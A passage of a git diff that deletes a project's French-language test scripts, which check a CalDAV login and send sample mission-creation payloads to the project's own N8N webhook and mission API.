-BODY2=$(echo "$RESPONSE2" | sed '/HTTP_CODE:/d')
-
-echo "HTTP Status: $HTTP_CODE2"
-if [ "$HTTP_CODE2" = "200" ]; then
-  echo "✅ SUCCESS"
-  echo ""
-  echo "Headers (capacités):"
-  curl -s -I -X OPTIONS \
-    -u "${EMAIL}:${PASSWORD}" \
-    "${BASE_URL}/" | grep -i "dav\|allow\|calendar"
-else
-  echo "❌ FAILED - Erreur HTTP $HTTP_CODE2"
-fi
-
-echo ""
-echo ""
-
-# Test 3: GET sur la racine
-echo "Test 3: GET sur la racine (/)"
-echo "------------------------------"
-RESPONSE3=$(curl -s -w "\nHTTP_CODE:%{http_code}" \
-  -u "${EMAIL}:${PASSWORD}" \
-  "${BASE_URL}/")
-
-HTTP_CODE3=$(echo "$RESPONSE3" | grep -o "HTTP_CODE:[0-9]*" | cut -d: -f2)
-BODY3=$(echo "$RESPONSE3" | sed '/HTTP_CODE:/d')
-
-echo "HTTP Status: $HTTP_CODE3"
-if [ "$HTTP_CODE3" = "200" ] || [ "$HTTP_CODE3" = "207" ]; then
-  echo "✅ SUCCESS"
-  echo ""
-  echo "Réponse:"
-  echo "$BODY3" | head -30
-else
-  echo "❌ FAILED - Erreur HTTP $HTTP_CODE3"
-fi
-
-echo ""
-echo ""
-
-# Test 4: Vérification avec verbose pour voir les headers d'authentification
-echo "Test 4: Requête verbose (pour debug)"
-echo "-------------------------------------"
-echo "Commande curl complète:"
-echo "curl -v -X PROPFIND -u \"${EMAIL}:***\" -H \"Depth: 1\" \"${BASE_URL}/\""
-echo ""
-echo "Exécution (sans afficher le password):"
-curl -v -X PROPFIND \
-  -u "${EMAIL}:${PASSWORD}" \
-  -H "Depth: 1" \
-  -H "Content-Type: application/xml" \
-  --data-binary '<?xml version="1.0" encoding="utf-8" ?>
-<d:propfind xmlns:d="DAV:">
-  <d:prop>
-    <d:displayname />
-  </d:prop>
-</d:propfind>' \
-  "${BASE_URL}/" 2>&1 | grep -E "(< HTTP|Authorization|WWW-Authenticate|401|200|207)" | head -20
-
-echo ""
-echo "=========================================="
-echo "Résumé:"
-echo "=========================================="
-if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "207" ]; then
-  echo "✅ La connexion CalDAV fonctionne correctement"
-  echo "   Le problème pourrait être dans le code Node.js"
-elif [ "$HTTP_CODE" = "401" ]; then
-  echo "❌ Erreur 401 Unauthorized"
-  echo "   Causes possibles:"
-  echo "   1. Mot de passe incorrect"
-  echo "   2. 2FA activé - nécessite un mot de passe d'application"
-  echo "   3. Compte suspendu ou désactivé"
-  echo "   4. 
Email incorrect" -else - echo "⚠️ Erreur HTTP $HTTP_CODE" - echo " Vérifiez la connexion réseau et l'URL" -fi -echo "" diff --git a/test-n8n-curl-env.sh b/test-n8n-curl-env.sh deleted file mode 100644 index 9b33ccc..0000000 --- a/test-n8n-curl-env.sh +++ /dev/null @@ -1,52 +0,0 @@ -#!/bin/bash - -# Curl simple utilisant les variables d'environnement -# Charge automatiquement .env.local si présent - -# Charger .env.local -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -# Utiliser les variables d'environnement -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY}" - -# Vérifier que l'API key est définie -if [ -z "$API_KEY" ]; then - echo "❌ Erreur: N8N_API_KEY n'est pas définie" - echo " Vérifiez votre fichier .env.local ou exportez N8N_API_KEY" - exit 1 -fi - -# Paramètres optionnels -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -echo "🧪 Test webhook N8N" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "API URL: $API_URL" -echo "Mission ID: $MISSION_ID" -echo "RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "" - -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"name\": \"SEFFIR\", - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"gitRepoUrl\": \"\", - \"leantimeProjectId\": \"517\", - \"documentationCollectionId\": \"08919836-435a-466f-a38a-014991759da2\", - \"rocketchatChannelId\": \"${ROCKETCHAT_CHANNEL_ID}\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"missionType\": \"remote\", - \"niveau\": \"s\" - }" \ - -s | jq '.' - -echo "" -echo "✅ Test terminé" diff --git a/test-n8n-curl-precise.sh b/test-n8n-curl-precise.sh deleted file mode 100644 index 5e3b5e4..0000000 --- a/test-n8n-curl-precise.sh +++ /dev/null @@ -1,37 +0,0 @@ -#!/bin/bash - -# Version curl simple et précise -# Charge .env.local automatiquement - -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" - -curl -X POST "https://brain.slm-lab.net/webhook-test/mission-created" \ - -H "Content-Type: application/json" \ - -d "{ - \"name\": \"SEFFIR\", - \"oddScope\": [\"odd-4\"], - \"niveau\": \"s\", - \"intention\": \"\", - \"missionType\": \"remote\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"services\": [], - \"participation\": \"ouvert\", - \"profils\": [], - \"guardians\": {}, - \"volunteers\": [], - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"missionId\": \"${MISSION_ID}\", - \"logoPath\": \"missions/${MISSION_ID}/logo.png\", - \"logoUrl\": \"https://hub.slm-lab.net/api/missions/image/missions/${MISSION_ID}/logo.png\", - \"config\": { - \"N8N_API_KEY\": \"${N8N_API_KEY}\", - \"MISSION_API_URL\": \"${API_URL}\" - } - }" \ - -s | jq '.' 
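-
-# NB: "/webhook-test/..." URLs only respond while the workflow is open in the
-# N8N editor with "Listen for test event" active; once the workflow is
-# activated, use the production "/webhook/..." path instead.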
diff --git a/test-n8n-curl.sh b/test-n8n-curl.sh deleted file mode 100644 index d196ea2..0000000 --- a/test-n8n-curl.sh +++ /dev/null @@ -1,22 +0,0 @@ -#!/bin/bash - -# Curl simple pour tester la sortie N8N -# Remplacez les valeurs entre <...> par vos vraies valeurs - -curl -X POST "https://hub.slm-lab.net/api/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: " \ - -d '{ - "missionId": "3103ec1a-acde-4025-9ead-4e1a0ddc047c", - "name": "SEFFIR", - "creatorId": "203cbc91-61ab-47a2-95d2-b5e1159327d7", - "gitRepoUrl": "", - "leantimeProjectId": "517", - "documentationCollectionId": "08919836-435a-466f-a38a-014991759da2", - "rocketchatChannelId": "ByehQjC44FwMeiLbX", - "donneurDOrdre": "group", - "projection": "long", - "missionType": "remote", - "niveau": "s" - }' \ - -v diff --git a/test-n8n-inline.sh b/test-n8n-inline.sh deleted file mode 100644 index 038aecf..0000000 --- a/test-n8n-inline.sh +++ /dev/null @@ -1,86 +0,0 @@ -#!/bin/bash - -# Version inline avec paramètres -# Usage: ./test-n8n-inline.sh [MISSION_ID] [PROJECT_NAME] - -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -PROJECT_NAME="${2:-SEFFIR}" - -python3 << EOF -import urllib.request -import json -import os -import sys - -# Charger .env.local -env_vars = {} -if os.path.exists('.env.local'): - with open('.env.local') as f: - for line in f: - if '=' in line and not line.strip().startswith('#'): - key, value = line.strip().split('=', 1) - env_vars[key] = value - -webhook_url = "https://brain.slm-lab.net/webhook-test/mission-created" -mission_id = "${MISSION_ID}" -project_name = "${PROJECT_NAME}" -api_key = env_vars.get('N8N_API_KEY', os.environ.get('N8N_API_KEY')) -api_url = env_vars.get('NEXT_PUBLIC_API_URL', os.environ.get('NEXT_PUBLIC_API_URL', 'https://hub.slm-lab.net/api')) - -if not api_key: - print("❌ Erreur: N8N_API_KEY n'est pas définie") - sys.exit(1) - -print(f"🧪 Test du webhook N8N") -print(f"Mission ID: {mission_id}") -print(f"Project Name: {project_name}") -print("") - -data = { - "name": project_name, - "oddScope": ["odd-4"], - "niveau": "s", - "intention": "", - "missionType": "remote", - "donneurDOrdre": "group", - "projection": "long", - "services": [], - "participation": "ouvert", - "profils": [], - "guardians": {}, - "volunteers": [], - "creatorId": "203cbc91-61ab-47a2-95d2-b5e1159327d7", - "missionId": mission_id, - "logoPath": f"missions/{mission_id}/logo.png", - "logoUrl": f"https://hub.slm-lab.net/api/missions/image/missions/{mission_id}/logo.png", - "config": { - "N8N_API_KEY": api_key, - "MISSION_API_URL": api_url - } -} - -req = urllib.request.Request( - webhook_url, - data=json.dumps(data).encode('utf-8'), - headers={'Content-Type': 'application/json'} -) - -try: - with urllib.request.urlopen(req) as response: - print(f"✅ Status: {response.status} {response.reason}") - print(f"📄 Réponse:") - response_data = json.loads(response.read().decode('utf-8')) - print(json.dumps(response_data, indent=2)) -except urllib.error.HTTPError as e: - print(f"❌ HTTP Error {e.code}: {e.reason}") - try: - error_body = e.read().decode('utf-8') - print(f"📄 Corps de l'erreur:") - print(json.dumps(json.loads(error_body), indent=2)) - except: - print(error_body) - sys.exit(1) -except Exception as e: - print(f"❌ Erreur: {e}") - sys.exit(1) -EOF diff --git a/test-n8n-python.py b/test-n8n-python.py deleted file mode 100644 index 67bb349..0000000 --- a/test-n8n-python.py +++ /dev/null @@ -1,87 +0,0 @@ -#!/usr/bin/env python3 -""" -Script pour tester le webhook N8N -Usage: python3 
test-n8n-python.py [MISSION_ID] [PROJECT_NAME] -""" - -import urllib.request -import json -import os -import sys - -# Charger .env.local -env_vars = {} -if os.path.exists('.env.local'): - with open('.env.local') as f: - for line in f: - if '=' in line and not line.strip().startswith('#'): - key, value = line.strip().split('=', 1) - env_vars[key] = value - -# Paramètres depuis la ligne de commande ou variables d'environnement -mission_id = sys.argv[1] if len(sys.argv) > 1 else os.environ.get('MISSION_ID', '3103ec1a-acde-4025-9ead-4e1a0ddc047c') -project_name = sys.argv[2] if len(sys.argv) > 2 else os.environ.get('PROJECT_NAME', 'SEFFIR') - -webhook_url = "https://brain.slm-lab.net/webhook-test/mission-created" -api_key = env_vars.get('N8N_API_KEY', os.environ.get('N8N_API_KEY')) -api_url = env_vars.get('NEXT_PUBLIC_API_URL', os.environ.get('NEXT_PUBLIC_API_URL', 'https://hub.slm-lab.net/api')) - -if not api_key: - print("❌ Erreur: N8N_API_KEY n'est pas définie") - print(" Vérifiez votre fichier .env.local ou exportez N8N_API_KEY") - sys.exit(1) - -print(f"🧪 Test du webhook N8N") -print(f"━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━") -print(f"Webhook URL: {webhook_url}") -print(f"Mission ID: {mission_id}") -print(f"Project Name: {project_name}") -print(f"") - -data = { - "name": project_name, - "oddScope": ["odd-4"], - "niveau": "s", - "intention": "", - "missionType": "remote", - "donneurDOrdre": "group", - "projection": "long", - "services": [], - "participation": "ouvert", - "profils": [], - "guardians": {}, - "volunteers": [], - "creatorId": "203cbc91-61ab-47a2-95d2-b5e1159327d7", - "missionId": mission_id, - "logoPath": f"missions/{mission_id}/logo.png", - "logoUrl": f"https://hub.slm-lab.net/api/missions/image/missions/{mission_id}/logo.png", - "config": { - "N8N_API_KEY": api_key, - "MISSION_API_URL": api_url - } -} - -req = urllib.request.Request( - webhook_url, - data=json.dumps(data).encode('utf-8'), - headers={'Content-Type': 'application/json'} -) - -try: - with urllib.request.urlopen(req) as response: - print(f"✅ Status: {response.status} {response.reason}") - print(f"📄 Réponse:") - response_data = json.loads(response.read().decode('utf-8')) - print(json.dumps(response_data, indent=2)) -except urllib.error.HTTPError as e: - print(f"❌ HTTP Error {e.code}: {e.reason}") - try: - error_body = e.read().decode('utf-8') - print(f"📄 Corps de l'erreur:") - print(json.dumps(json.loads(error_body), indent=2)) - except: - print(error_body) - sys.exit(1) -except Exception as e: - print(f"❌ Erreur: {e}") - sys.exit(1) diff --git a/test-n8n-simple-vm.sh b/test-n8n-simple-vm.sh deleted file mode 100644 index beb8381..0000000 --- a/test-n8n-simple-vm.sh +++ /dev/null @@ -1,45 +0,0 @@ -#!/bin/bash - -# Version simple pour la VM - utilise curl si disponible -# Usage: ./test-n8n-simple-vm.sh [MISSION_ID] - -# Charger .env.local -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" - -if [ -z "$N8N_API_KEY" ]; then - echo "❌ N8N_API_KEY non définie" - exit 1 -fi - -echo "🧪 Test webhook N8N: https://brain.slm-lab.net/webhook-test/mission-created" -echo "" - -curl -X POST "https://brain.slm-lab.net/webhook-test/mission-created" \ - -H "Content-Type: application/json" \ - -d "{ - \"name\": \"SEFFIR\", - \"oddScope\": [\"odd-4\"], - \"niveau\": \"s\", - \"missionType\": \"remote\", - \"donneurDOrdre\": \"group\", - 
\"projection\": \"long\", - \"services\": [], - \"participation\": \"ouvert\", - \"profils\": [], - \"guardians\": {}, - \"volunteers\": [], - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"missionId\": \"${MISSION_ID}\", - \"logoPath\": \"missions/${MISSION_ID}/logo.png\", - \"logoUrl\": \"https://hub.slm-lab.net/api/missions/image/missions/${MISSION_ID}/logo.png\", - \"config\": { - \"N8N_API_KEY\": \"${N8N_API_KEY}\", - \"MISSION_API_URL\": \"${API_URL}\" - } - }" \ - -s | python3 -m json.tool 2>/dev/null || cat diff --git a/test-n8n-simple.sh b/test-n8n-simple.sh deleted file mode 100644 index a430d14..0000000 --- a/test-n8n-simple.sh +++ /dev/null @@ -1,39 +0,0 @@ -#!/bin/bash - -# Version simple - charge .env.local automatiquement -# Usage: ./test-n8n-simple.sh [MISSION_ID] [ROCKETCHAT_CHANNEL_ID] - -# Charger .env.local -if [ -f .env.local ]; then - set -a - source .env.local - set +a -fi - -# Variables -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY}" -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -if [ -z "$API_KEY" ]; then - echo "❌ N8N_API_KEY non définie" - exit 1 -fi - -echo "🧪 Test avec RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "" - -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"name\": \"SEFFIR\", - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"gitRepoUrl\": \"\", - \"leantimeProjectId\": \"517\", - \"documentationCollectionId\": \"08919836-435a-466f-a38a-014991759da2\", - \"rocketchatChannelId\": \"${ROCKETCHAT_CHANNEL_ID}\" - }" \ - -s | jq '.' diff --git a/test-n8n-vm.sh b/test-n8n-vm.sh deleted file mode 100644 index 32e3933..0000000 --- a/test-n8n-vm.sh +++ /dev/null @@ -1,158 +0,0 @@ -#!/bin/bash - -# Script pour tester le webhook N8N depuis la VM -# Utilise les outils disponibles: curl, wget, python3, node - -# Charger .env.local si présent -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -# Variables -WEBHOOK_URL="https://brain.slm-lab.net/webhook-test/mission-created" -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY}" - -# Vérifier que l'API key est définie -if [ -z "$API_KEY" ]; then - echo "❌ Erreur: N8N_API_KEY n'est pas définie" - echo " Vérifiez votre fichier .env.local ou exportez N8N_API_KEY" - exit 1 -fi - -echo "🧪 Test du webhook N8N depuis la VM" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "Webhook URL: $WEBHOOK_URL" -echo "Mission ID: $MISSION_ID" -echo "API URL: $API_URL" -echo "" - -# Préparer le JSON -JSON_DATA=$(cat < /dev/null; then - echo "📤 Utilisation de curl..." - echo "" - curl -X POST "${WEBHOOK_URL}" \ - -H "Content-Type: application/json" \ - -d "$JSON_DATA" \ - -v -elif command -v wget &> /dev/null; then - echo "📤 Utilisation de wget..." - echo "" - echo "$JSON_DATA" | wget --method=POST \ - --header="Content-Type: application/json" \ - --body-data=- \ - --output-document=- \ - --server-response \ - "${WEBHOOK_URL}" 2>&1 -elif command -v python3 &> /dev/null; then - echo "📤 Utilisation de python3..." - echo "" - python3 < /dev/null; then - echo "📤 Utilisation de node..." 
- echo "" - node < { - console.log(\`Status: \${res.statusCode} \${res.statusMessage}\`); - console.log(\`Headers:\`, res.headers); - console.log(\`\nResponse Body:\`); - - let body = ''; - res.on('data', (chunk) => { body += chunk; }); - res.on('end', () => { - try { - console.log(JSON.stringify(JSON.parse(body), null, 2)); - } catch (e) { - console.log(body); - } - }); -}); - -req.on('error', (e) => { - console.error(\`Erreur: \${e.message}\`); - process.exit(1); -}); - -req.write(JSON.stringify(data)); -req.end(); -NODE_SCRIPT -else - echo "❌ Aucun outil disponible (curl, wget, python3, node)" - exit 1 -fi - -echo "" -echo "" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "✅ Test terminé" -echo "" -echo "💡 Vérifiez les logs N8N pour voir la structure de la réponse RocketChat" diff --git a/test-n8n-webhook-direct.sh b/test-n8n-webhook-direct.sh deleted file mode 100644 index f1ccb3c..0000000 --- a/test-n8n-webhook-direct.sh +++ /dev/null @@ -1,62 +0,0 @@ -#!/bin/bash - -# Test direct du webhook N8N -# Usage: ./test-n8n-webhook-direct.sh [MISSION_ID] [ROCKETCHAT_CHANNEL_ID] - -# Charger .env.local si présent -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -# URL du webhook N8N -WEBHOOK_URL="https://brain.slm-lab.net/webhook-test/mission-created" - -# Paramètres optionnels -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -echo "🧪 Test du webhook N8N directement" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "Webhook URL: $WEBHOOK_URL" -echo "Mission ID: $MISSION_ID" -echo "RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "" - -# Test avec tous les champs (simule ce que Next.js envoie à N8N) -echo "📤 Envoi de la requête complète au webhook N8N..." -echo "" - -curl -X POST "${WEBHOOK_URL}" \ - -H "Content-Type: application/json" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"name\": \"SEFFIR\", - \"oddScope\": [\"odd-4\"], - \"niveau\": \"s\", - \"missionType\": \"remote\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"services\": [], - \"participation\": \"ouvert\", - \"profils\": [], - \"hasGuardians\": true, - \"volunteersCount\": 0, - \"hasLogo\": true, - \"config\": { - \"MISSION_API_URL\": \"${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}\", - \"N8N_API_KEY\": \"${N8N_API_KEY}\", - \"ROCKETCHAT_API_URL\": \"${ROCKET_CHAT_API_URL:-https://parole.slm-lab.net}\", - \"ROCKETCHAT_AUTH_TOKEN\": \"${ROCKET_CHAT_TOKEN}\", - \"ROCKETCHAT_USER_ID\": \"${ROCKET_CHAT_USER_ID}\" - }, - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\" - }" \ - -v - -echo "" -echo "" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "✅ Test terminé" -echo "" -echo "💡 Note: Ce test déclenche le workflow N8N complet." -echo " Vérifiez les logs N8N pour voir la structure exacte de la réponse RocketChat." 
diff --git a/test-n8n-webhook-env.sh b/test-n8n-webhook-env.sh deleted file mode 100644 index 6612122..0000000 --- a/test-n8n-webhook-env.sh +++ /dev/null @@ -1,116 +0,0 @@ -#!/bin/bash - -# Script pour tester le webhook N8N en utilisant les variables d'environnement -# Usage: source .env.local && ./test-n8n-webhook-env.sh [MISSION_ID] [ROCKETCHAT_CHANNEL_ID] - -# Charger les variables d'environnement depuis .env.local si elles existent -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -# Configuration depuis les variables d'environnement -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY}" - -# Vérifier que l'API key est définie -if [ -z "$API_KEY" ]; then - echo "❌ Erreur: N8N_API_KEY n'est pas définie dans les variables d'environnement" - echo " Assurez-vous d'avoir chargé .env.local ou défini N8N_API_KEY" - exit 1 -fi - -# Paramètres (utiliser ceux fournis ou des valeurs par défaut pour test) -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -echo "🧪 Test du webhook N8N mission-created" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "API URL: $API_URL" -echo "Mission ID: $MISSION_ID" -echo "RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "API Key: ${API_KEY:0:10}... (masquée)" -echo "" - -# Test principal avec tous les champs -echo "📤 Envoi de la requête avec RocketChat Channel ID..." -echo "" - -RESPONSE=$(curl -s -w "\n%{http_code}" -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"name\": \"SEFFIR\", - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"gitRepoUrl\": \"\", - \"leantimeProjectId\": \"517\", - \"documentationCollectionId\": \"08919836-435a-466f-a38a-014991759da2\", - \"rocketchatChannelId\": \"${ROCKETCHAT_CHANNEL_ID}\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"missionType\": \"remote\", - \"niveau\": \"s\" - }") - -HTTP_CODE=$(echo "$RESPONSE" | tail -n1) -BODY=$(echo "$RESPONSE" | sed '$d') - -echo "📥 Réponse HTTP: $HTTP_CODE" -echo "📄 Corps de la réponse:" -echo "$BODY" | jq '.' 2>/dev/null || echo "$BODY" -echo "" - -if [ "$HTTP_CODE" = "200" ]; then - echo "✅ Succès! La mission a été mise à jour." -else - echo "❌ Erreur HTTP $HTTP_CODE" -fi - -echo "" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "" -echo "🔍 Tests supplémentaires avec différents formats de rocketchatChannelId:" -echo "" - -# Test 1: ID valide -echo "=== Test 1: ID RocketChat valide ===" -curl -s -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": \"ByehQjC44FwMeiLbX\" - }" | jq '.' || echo "Erreur de parsing JSON" -echo "" - -# Test 2: null -echo "=== Test 2: ID RocketChat null ===" -curl -s -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": null - }" | jq '.' 
|| echo "Erreur de parsing JSON" -echo "" - -# Test 3: chaîne vide -echo "=== Test 3: ID RocketChat chaîne vide ===" -curl -s -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": \"\" - }" | jq '.' || echo "Erreur de parsing JSON" -echo "" - -# Test 4: non fourni -echo "=== Test 4: ID RocketChat non fourni ===" -curl -s -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\" - }" | jq '.' || echo "Erreur de parsing JSON" -echo "" diff --git a/test-n8n-webhook-precise.sh b/test-n8n-webhook-precise.sh deleted file mode 100644 index 43b4e38..0000000 --- a/test-n8n-webhook-precise.sh +++ /dev/null @@ -1,65 +0,0 @@ -#!/bin/bash - -# Test précis du webhook N8N avec la structure exacte envoyée par Next.js -# Usage: ./test-n8n-webhook-precise.sh [MISSION_ID] [ROCKETCHAT_CHANNEL_ID] - -# Charger .env.local -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | xargs) -fi - -# URL du webhook N8N -WEBHOOK_URL="https://brain.slm-lab.net/webhook-test/mission-created" - -# Variables d'environnement -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY}" - -# Paramètres optionnels -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -echo "🧪 Test précis du webhook N8N" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "Webhook URL: $WEBHOOK_URL" -echo "Mission ID: $MISSION_ID" -echo "RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "" - -# Structure exacte envoyée par Next.js (après nettoyage dans n8n-service.ts) -curl -X POST "${WEBHOOK_URL}" \ - -H "Content-Type: application/json" \ - -d "{ - \"name\": \"SEFFIR\", - \"oddScope\": [\"odd-4\"], - \"niveau\": \"s\", - \"intention\": \"\", - \"missionType\": \"remote\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"services\": [], - \"participation\": \"ouvert\", - \"profils\": [], - \"guardians\": {}, - \"volunteers\": [], - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"missionId\": \"${MISSION_ID}\", - \"logoPath\": \"missions/${MISSION_ID}/logo.png\", - \"logoUrl\": \"https://hub.slm-lab.net/api/missions/image/missions/${MISSION_ID}/logo.png\", - \"config\": { - \"N8N_API_KEY\": \"${API_KEY}\", - \"MISSION_API_URL\": \"${API_URL}\" - } - }" \ - -v - -echo "" -echo "" -echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" -echo "✅ Test terminé" -echo "" -echo "💡 Ce test déclenche le workflow N8N complet." -echo " Vérifiez les logs N8N pour voir:" -echo " 1. La structure de la réponse RocketChat" -echo " 2. Le chemin exact pour accéder à channel._id" -echo " 3. 
La valeur exacte de rocketchatChannelId dans 'Save Mission To API'" diff --git a/test-n8n-webhook.sh b/test-n8n-webhook.sh deleted file mode 100644 index 7e88a7a..0000000 --- a/test-n8n-webhook.sh +++ /dev/null @@ -1,84 +0,0 @@ -#!/bin/bash - -# Script pour tester le webhook N8N mission-created -# Usage: ./test-n8n-webhook.sh [MISSION_ID] [ROCKETCHAT_CHANNEL_ID] - -# Configuration -API_URL="${NEXT_PUBLIC_API_URL:-https://hub.slm-lab.net/api}" -API_KEY="${N8N_API_KEY:-your-api-key-here}" - -# Paramètres (utiliser ceux fournis ou des valeurs par défaut pour test) -MISSION_ID="${1:-3103ec1a-acde-4025-9ead-4e1a0ddc047c}" -ROCKETCHAT_CHANNEL_ID="${2:-ByehQjC44FwMeiLbX}" - -echo "Testing N8N webhook output..." -echo "API URL: $API_URL" -echo "Mission ID: $MISSION_ID" -echo "RocketChat Channel ID: $ROCKETCHAT_CHANNEL_ID" -echo "" - -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"name\": \"SEFFIR\", - \"creatorId\": \"203cbc91-61ab-47a2-95d2-b5e1159327d7\", - \"gitRepoUrl\": \"\", - \"leantimeProjectId\": \"517\", - \"documentationCollectionId\": \"08919836-435a-466f-a38a-014991759da2\", - \"rocketchatChannelId\": \"${ROCKETCHAT_CHANNEL_ID}\", - \"donneurDOrdre\": \"group\", - \"projection\": \"long\", - \"missionType\": \"remote\", - \"niveau\": \"s\" - }" \ - -v - -echo "" -echo "" -echo "Test avec différents formats de rocketchatChannelId:" -echo "" - -# Test 1: ID valide -echo "=== Test 1: ID RocketChat valide ===" -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": \"ByehQjC44FwMeiLbX\" - }" \ - -s | jq '.' - -echo "" -echo "=== Test 